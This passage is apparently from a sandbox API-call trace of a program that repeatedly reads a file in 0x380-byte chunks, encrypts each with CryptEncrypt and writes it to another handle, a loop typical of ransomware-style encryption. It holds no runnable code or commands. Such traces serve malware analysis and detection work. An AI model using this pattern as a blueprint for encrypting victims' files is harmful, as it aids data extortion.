lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.903] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.903] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.903] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.904] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.904] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.904] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.904] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.905] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.905] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.905] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.905] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.905] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.905] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.905] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.905] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.906] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.906] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.906] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.906] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.906] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.906] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.907] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.907] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.907] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.907] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.907] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.908] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.908] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.908] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.908] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.908] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.908] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.909] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.909] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.909] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.909] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.909] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.909] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.910] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.910] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.910] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.910] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.910] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.910] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.911] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.911] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) 